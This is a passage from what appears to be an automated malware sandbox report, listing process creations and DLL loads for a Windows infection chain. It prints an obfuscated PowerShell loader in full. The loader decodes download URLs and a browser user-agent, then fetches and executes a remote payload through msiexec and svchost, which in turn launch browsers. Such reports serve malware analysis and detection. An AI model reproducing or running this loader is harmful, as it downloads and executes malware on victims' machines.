HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKl
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chr1B0.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a506004f/bd5c97e1"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2460,i,18042430906892468815,13956811968867216056,262144 /prefetch:8
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a506004f/0da50779"
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2724 --field-trial-handle=2140,i,8472983126919404237,17192914109164823712,262144 /prefetch:3
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chr1B0.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a506004f/bd5c97e1"Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a506004f/0da50779"Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"Jump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2460,i,18042430906892468815,13956811968867216056,262144 /prefetch:8Jump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2724 --field-trial-handle=2140,i,8472983126919404237,17192914109164823712,262144 /prefetch:3Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
